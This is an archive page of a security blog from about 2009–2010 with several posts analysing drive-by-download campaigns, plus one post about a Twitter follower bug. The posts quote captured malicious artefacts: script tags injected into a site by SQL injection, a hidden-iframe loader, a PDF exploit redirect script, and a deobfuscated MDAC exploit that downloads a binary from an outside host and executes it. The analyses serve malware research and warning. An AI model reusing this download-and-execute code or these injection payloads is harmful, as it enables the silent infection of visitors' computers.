Archive for the 'Vulnerabilities' Category

11
Jun

Robint.us SQLi Utilizing CVE-2010-1297 Exploit

By lithium Comments
Categories: Exploit, Hack, IFRAME, SQL Injection, SQLi, Video and Vulnerabilities

The crew behind the recent massive SQLi is currently exploiting  the latest CVE-2010-1297 vulnerability in its drive-by-download attacks.  Yesterday, I created a video demonstrating how Cloud Antivirus blocked the 0day exploit using the new behavioral blocking technology included in the free version.  Check that out here:

We recommend patching Adobe and then installing Cloud Antivirus to prevent any future 0day attacks.

Here are some logs of our most recent encounter:

Session traffic:

GET hxxp://2677.in/cnzz.html

200 OK (text/html)

GET hxxp://2677.in/ie.html

200 OK (text/html)

GET hxxp://s11.cnzz.com/stat.php?id=1990191&web_id=1990191

200 OK (text/html)

GET hxxp://2677.in/log.txt

200 OK (text/plain)

GET hxxp://2677.in/anhey.swf

200 OK (application/x-shockwave-flash)

GET hxxp://2677.in/anhey.swf

206 Partial Content (application/x-shockwave-flash)

GET

hxxp://zs13.cnzz.com/stat.htm?id=1990191&r=http%3A//www.generationdb.com/&lg

=en-us&ntime=0.14859300%201276289711&repeatip=0&rtime=0&cnzz_eid=82761217-12

76289711-http%3A//www.generationdb.com/&showp=800×600&st=1276292642&sin=http

%3A//www.generationdb.com/&res=0

200 OK (image/gif)

GET hxxp://2677.in/log.exe

200 OK (application/octet-stream)

Injection log:

< table width=”96%” border=”0″ align=”center” cellpadding=”0″

cellspacing=”0″  >

< tr  >

< td colspan=”2″  >   < img alt=”" src=”images/5×5.gif” width=”5″ height=”8″

/  >  < /td  >

< /tr  >

< tr  >

< td align=”center” class=”hoverbox”  >   < a href=”#”  >   < img

src=’upload/community/moresmall_37726110_lego.jpg< script src=hxxp://ww.robint.us/u.js  >  < /script  >  < script src=hxxp://2677.in/yahoo.js  >  < /script  >  ‘ alt=”" /  >  < img src=’upload/community/large_37726110_lego.jpg< script src=http://ww.robint.us/u.js  >  < /script  >  < script src=hxxp://2677.in/yahoo.js  >  < /script  >  ‘ alt=”" class=”preview” /  > < /a  >  < /td  >

< td width=”55%” valign=”top” class=”category”  >

< a href=”unregisteredcommunity.aspx?Com_id=’7′”

target=”_self”  >    We are all  < /a  >  … < br  /  >  Category: Groups,<

br /  >  Location: USA< script src=hxxp://2677.in/yahoo.js  >  < /script  > < /td  > < /tr  > < tr  > < td colspan=”2″  > —————————————–< /td  > < /tr  > < /table  > < /td  >

< /tr  >  < tr  >

< td  >

< table width=”96%” border=”0″ align=”center” cellpadding=”0″

cellspacing=”0″  >

< tr  >

< td colspan=”2″  >   < img alt=”" src=”images/5×5.gif” width=”5″ height=”8″

/  >  < /td  >

< /tr  >

< tr  >

< td align=”center” class=”hoverbox”  >   < a href=”#”  >   < img

src=’upload/community/moresmall_2065474113_IMG_4127.JPG< script src=hxxp://ww.robint.us/u.js  >  < /script  >  < script src=hxxp://2677.in/yahoo.js  >  < /script  >  ‘ alt=”" /  >  < img src=’upload/community/large_2065474113_IMG_4127.JPG< script src=hxxp://ww.robint.us/u.js  >  < /script  >  < script src=hxxp://2677.in/yahoo.js  >  < /script  >  ‘ alt=”" class=”preview” /  > < /a  >  < /td  >

< td width=”55%” valign=”top” class=”category”  >

< a href=”unregisteredcommunity.aspx?Com_id=’6′”

target=”_self”  >    Technosoft < /a  >  … < br  /  >  Category:

Business,< br /  >  Location: India< script src=hxxp://2677.in/yahoo.js  > < /script  >  < /td  > < /tr  > < tr  > < td colspan=”2″ class=”line”  > —————————————–< /td  > < /tr  > < /table  > < /td  >

< /tr  >

< /table  >

10
May

Twitter hacked by “Turkish Hacker”

By lithium Comments
Categories: Hack, Twitter and Vulnerabilities

This morning I logged into my twitter account and noticed something strange.  My Twitter follower count moved from over 5500 followers to zero instantaneously between reloads!  Apparently, a Turkish hacker was able to exploit a bug in the Twitter website which allowed the hacker to force other Twitter accounts to automatically follow him and suddenly every Twitter account had their follower count rolled back to zero.  Many Twitter users immediately tweeted about the issue and several celebrities chimed in on the issue:

Ashton Kutcher: twitter is being hacked by some turkish hacker. haha I have 0 followers.

Justin Bieber: so i woke up here in LA and Twitter has been hacked. Turns out I am no longer popular … hackers i send a warning…u have now pissed off over 2 million teenage girls. They are more dangerous than Navy Seals.

Jim Carrey: Imagine if this hacker put his/her talent 2 some worthy use. They could 1 day have more than a false sense of superiority. They’d #BOING ;^>

Alyssa Milano: Ummmmm….. Where did my followers go @Twitter?

Mark Indelicato: It says that I have 0 followers……

Stephen Collins (7th Heaven): According 2 Twitter they’ve fixed a bug/hack that re-set following/follower #s to 0. Scary. So far, my acct isn’t re-set. Holding breath.

Joe Jonas: Wait.. So this means I have to “talk” to my friends?

The bug was first discovered in a Turkish website, which I have attempted to translate (any of our Turkish viewers willing to submit a better translation?) with Google Translate:

I know that I do not think this bug. twiti accept that start with a code that identifies the code as written should be. twitter is too flat or system that is quite a simple system they write, next to facebook. entered with the data sent by the same function, they showed twiti. After all, if you want to send a data in a way and this is a bug if you send a code to be written against it, by entering a twit you’ve done the easy way ha, ha hard way. When the easy way to write the entire code is perceived as most likely. I would not do so even if I was, anyway.

hide profile sent to people who question the follower They’ll accept bids for your keywords, if you request a follow no action will be taken. so simple.

note: I’m speaking without knowing, I have no programming knowledge about the particles. I like to rant, swh.

It’s still a bit unclear as to who this Turkish Hacker is, although it may be safe to assume that one of the now suspended accounts (@borakrc) in the above Turkish blog is him.  The Twitter staff has acknowledged the bug and has already taken remediation steps to fix the error.

13
Oct

Internet Exploitation Adventure

By djpnuemo Comments
Categories: Database Update, IFRAME, Rogue Software and Vulnerabilities

This post shows the lengths people will go to in order install malware onto computers. We will show how visiting one website will take you on a journey to many websites that will check your computer for vulnerable software and if found, will install malware on your computer.

First, there is a list of the domains involved in the exploit adventure. Simply visiting hxxp://defendmycreditunion.org will start this process. Then hidden iframes are loaded with websites scanning your computer for vulnerabilities and if it can’t, redirect you somewhere else. These websites are still active so proceed at your own risk.

The links on this page DO NOT link to the infected website. They are anchored links further down the page to view the analysis easier. The links just below are listed in the approximate order in which they load would while exploiting the machine.

BE ADVISED: The actual domains may still be active. Proceed at your own risk!

Picture below shows visual map of how pages are loaded.

Continue reading ‘Internet Exploitation Adventure’

05
Oct

Multiple Exploit Page (Acrobat, Outlook Express, & Quicktime)-VIDEO

By djpnuemo Comments
Categories: Database Update, Malicious Domains, Malicious Links, Malware and Vulnerabilities

Here is another example of an exploit page. This exploit searches for a vilnerability and then injects the malware to the computer. In this case, there are multiple files in use here. All the files are listed below with details. As with previous posts, we captured video of the exploit in action.  The files are available our repository under /pnuemo-malware/1005-exploit.zip.

The first page starts the search for an vulnerability to exploit and once found, loads the binary from the next URL. It will look for vulnerabilities in Adobe Acrobat, Outlook Express, and Quicktime to name a few. The exploit page has multiple pages of obfuscated code that is too much to post. You can download the code here (.txt).

BE ADVISED: This websites may still be live. Proceed at your own risk.

hxxp://195.242.161.63/z/index.php -> hxxp://195.242.161.63/z/load.php?ssv=

doc.pdf
Result: 8/36 (22.23%)
MD5: 2b477c02cef58a4d965b149311f495f2
VirusTotal

default.exe
Result: 14/36 (38.89%)
MD5: df5fbc8fb5ab1e9a69c72508250cb451
VirusTotal
ThreatExpert Analysis

Download Video (.wmv)

04
Oct

Another Adobe Acrobat Exploit (accwizm.exe)-VIDEO

By djpnuemo Comments
Categories: Database Update, IFRAME, Malicious Links, Malware, Video and Vulnerabilities

Once again, we have an Adobe exploit page injecting another piece of malware. This one is different than the one posted earlier and this one redirects through multiple pages logging each visitor. I was able to capture a video of the computer being exploited simply by visiting the page. As with the previous exploit, the binary installed is almost fully undetected except for a few heuristic catches. Look below for more information about this exploit and information about the binary. It can be downloaded from /pnuemo-malware/ in our repository.

BE ADVISED: All sites my be active. Proceed at your own risk.

The user will visit the following URL: hxxp://66.232.117.33/~catetc/tdsHAX/kotopoucykanety.php

This pages contains a simple hidden iframe that will load multiple pages logging each visitor how visits.

<iframe src=”http://megsrdomain.cn/tor/count.php?o=5″ width=1 height=1 style=”visibility: hidden”></iframe>

In the iframe we are redirected two times until we reach the exploit page.

hxxp://megsrdomain.cn/tor/count.php?o=5 -> hxxp://megsrdomain.cn/tor/count.php?o=2 -> hxxp://82.103.138.10/ls/?t=24

hxxp://82.103.138.10/ls/?t=24 is the page that exploits Adobe Acrobat and installs the malware. This page contains many, many pages of code and there is too much to post here. You can view or download a clean .txt of the page code for this exploit by clicking here.

accwizm.exe
Result: 8/36 (22.22%)
MD5: 2bee943c7b8e63d17a92b99087ba15a7
VirusTotal
Sunbelt Sandbox

Download Video

04
Oct

MDAC Exploit Page (iexplorer.exe)

By djpnuemo Comments
Categories: Database Update, Malware Distribution and Vulnerabilities

We discovered another exploit page that will inject malware on to the users computer by way of a vulnerability in MDAC. The initial page is loaded with obfuscated code. When deobfuscated, it exploits Adobe and then opens the loader page in which the malware payload is injected. Below is analysis of the exploit page along with the malware information. The binary has very few real detections, most are just heuristics. This file is available in the repository under /pnuemo-malware/.

BE ADVISED: Websites may still be active, proceed at your own risk.

hxxp://gavai-pegc9.ws/Gpack/index.php

<html><head><meta HTTP-EQUIV=”REFRESH” content=”3; URL=index.php?404″><script language=
JavaScript>str = “ru`su)(: gtobuhno!ru`su)(!z w`s!{`e!<!enbtldou/bsd`udDmdldou)&nckdbu&(: {`e/rdu
@uushctud)&he&-&{`e&(: {`e/rdu@uushctud)&bm`rrhe&-&bm&*&rh&*#e;CE#*#87B4#*&47,74@2,0&
*#0E1,89#*&2@,11&*#B15#*&GB3&*#8D#*&27&(: usx!z w`s!p!<!{`e/Bsd`udNckdbu)&lr&*#yl#*&m3
&*#/#*&YL&*#MI#*&U&*&UQ&-&&(: w`s!r!<!{`e/Bsd`udNckdbu)#Ridm#*#m/@q#*#qm#*#hb`uh#*#n
o#-&&(: w`s!u!<!{`e/Bsd`udNckdbu)&`e&*&ne&*#c/#*&ru&*#sd#*&`l&-&&(: usx!z!u/uxqd!<!0:
p/nqdo)&F&*#D#*&U&-&iuuq;..f`w`h,qdfb8/vr.Fq`bj.mn`e/qiq&-g`mrd(: p/rdoe)(:!u/nqdo)(: u/Vshu
d)p/sdrqnordCnex(: w`s!o`ld!<!&/..//..hdyqmnsds/dyd&: u/R`wdUnGhmd)o`ld-3(: u/Bmnrd)(: |!b`ub
i)d(!z| usx!z!r/ridmmdydbtud)o`ld(:!|!b`ubi)d(!z|| b`ubi)d(z||”;str2 = “”;for (i = 0; i < str.length; i ++) { s
tr2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></head></html>

deobfuscates to:

start();
function start() {
var zad = document.createElement(‘object’);
zad.setAttribute(‘id’,'zad’);
zad.setAttribute(‘classid’,'cl’+'si’+”d:BD”+”96C5″+’56-65A3-1′+”1D0-98″+’3A-00′+”C04″+’FC2′+”9E”+
’36′);
try {
var q = zad.CreateObject(‘ms’+”xm”+’l2′+”.”+’XM’+”LH”+’T'+’TP’,”);
var s = zad.CreateObject(“Shel”+”l.Ap”+”pl”+”icati”+”on”,”);
var t = zad.CreateObject(‘ad’+'od’+”b.”+’st’+”re”+’am’,”);
try { t.type = 1;
q.open(‘G’+”E”+’T',’http://gavai-pegc9.ws/Gpack/load.php’,false);
q.send(); t.open();
t.Write(q.responseBody);
var name = ‘.//..//iexplorer.exe’;
t.SaveToFile(name,2);
t.Close();
} catch(e) {}
try { s.shellexecute(name); } catch(e) {}}
catch(e){}}

hxxp://gavai-pegc9.ws/Gpack/load.php downloads the malware binary.

file.exe
Result: 9/36 (25%)
MD5: e427f1c2438259b5b4bb386aec822e30
VirusTotal
ThreatExpert Sandbox Analysis

31
Aug

Adobe Acrobat Reader PDF Exploit (gnu.pdf & us.pdf) (UPDATED)

By djpnuemo Comments
Categories: Database Update, IFRAME, MalSpam, Malicious Links, Malware, Rogue Software and Vulnerabilities

This morning we’ve found a website that automatically loads an infected pdf file.

When the user is directed to the infected site, there is a hidden iframe that loads the pdf file. Here’s what happens…

Links still live, proceed at your own risk.

User visits hxxp://120.50.46.90/~admin/tps/index.php and the following obfuscated code is included

<script language=”javascript”>document.write(unescape(‘%3C%69%66%72
%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E
%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69
%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68
%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69
%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74
%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66
%72%61%6D%65%3E’));</script>

when deobfuscated…

<iframe src=”http://69.46.27.41/afxv/tpv/index.php” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

We can see the hidden iframe above and the page includes the following code…

<script>
ppdf=0;
i=0;
for(;navigator.plugins[i];i++)
{
re=/.d.{2}e.A.{2}o…..l..-.+?([0-9]+.[0-9]+)/;
if(res=re.exec(navigator.plugins[i].description))
{
ppdf=res[1];
}
var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
var res;
if(res=re.exec(navigator.plugins[i].description))
{
flash=res[1]+’.'+res[2]+’.'+res[3];
}
}
ppdfenable=0;
if(ppdf!=0)
{
ppdfenable=0;
ppdf=ppdf.replace(/\D/g,”");
if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
if(ppdf[0]<7)ppdfenable=1;if(ppdfenable)
{
document.write(‘<iframe width=1 height=1 src=”hxxp://69.46.27.41/afxv/tpv/gnu.pdf”></iframe>’);
}
}
</script>

Thus leading us to the pdf in question located at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information regarding this file. This is also available in /pnuemo-malware/.

gnu.pdf
Result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
VirusTotal

Update your software!

UPDATED 9/1 12p PST

us.pdf
Result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
VirusTotal
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf

26
Jul

The new wave of malware being sent by email, botnet for hire?

By ion Comments
Categories: E-mail, Malicious Links, Rogue Software, Social Engineering and Vulnerabilities

My friend Lithium has been blogging about the recent wave of malware being distributed by emails. There seem to be 2 differentiated campaigns right now:

1- Emails that have links to compromised web sites (no attachments)

2- Emails that have a .zip/exe attachment

As I was working on some of our customers computers (they got infected when clicking an email from UPS, even when they never shipped anything…) I realiced how bad this actually is. The people think that they are being infected by the rogue antivirus programs (antivirus xp, antivirus 2009, 2009 antivirus, aav,… whatever they decide to promote) but the origin of the infection itself is much worst than that:

The file received on the email is actually a variant of ZTOP or Sinowal (name changes depending on AV vendor)  These trojans have self update, key logging and remote control capabilities. Once installed, they “Phone home” to download updated commands. They do this periodically.

I ran one of them at one of my virtual machines. For a few seconds, nothing happened and I was even tempted to run it again. The the trojan connected to russia (hxxp://blatundalqik.ru/panama/odessa.bin) and downloaded new instructions. Inmediatelly, my virtual machine began closing applications, and before it restarted on its own the desktop background changed to the popular “your computer is infected”.

Once the computer restarted, I got one of the variants of xp antivirus running and my real antivirus was just dead. Constant warnings where coming from the task bar.I have seen this warnings hundreds of times. They are annoying, but usually they are not dangerous. This time is different.

What actually happened is that the trojan had installed itself (ntos.exe, crypts.dll, wnspoem folder and video/audio.dll files) and after calling home it was ordered to install xp antivirus. They ordered to install xp antivirus the same way they could have ordered to silently monitor the user browsing and capture any bank or credit card information. Tomorrow they may decide that they need spamming computers, or to do a DOS on a company… all they have to do is change the configuration file. All the infected zombies will follow orders!

Once ntos.exe and crypts.dll installs in a computer, the computer no longer belongs to the user. Using root kit technologies, the file will hide itself from the user, and only advanced rootkit detectors will be able to reveal the real problem. The trojan also runs from a temporary file on the temp folder, while crypts.dll monitors that the required registry entries to load it on restart are still present. The computer is now part of a botnet, another zombie to be used as needed.

About the xp antivirus infection? It’s anoying, you may have to fix a few registry entries to gain full desktop functionality but unless you go and buy their thing, they are more or less harmless (at least from a tech point of view, I’m sure the user will see that being worst than having a silent trojan)

Only the people controlling the hxxp://blatundalqik.ru server will know the actual extend of the infection. Besides the pop-ups and attempts to get your credit card information, the trojan could be recording your every key stroke, logging your visits to pay your bills, even taking screen shots of your applications; while all your confidential information is conveniently backed up in a server in Russia, should it ever be needed by some one (other than you)

The overload of xp antivirus and similar calls to the antivirus companies has also the effect of saturating their resources, having to dedicate more and more time to manual removal of infections, to keep the customer happy, while the real malicious codes are lurking on the background, undetected.

 

« Previous Entries
SANDBOX

SANDBOX ANALYSIS PAGE




 

September 2010
M T W T F S S
« Aug    
 12345
6789101112
13141516171819
20212223242526
27282930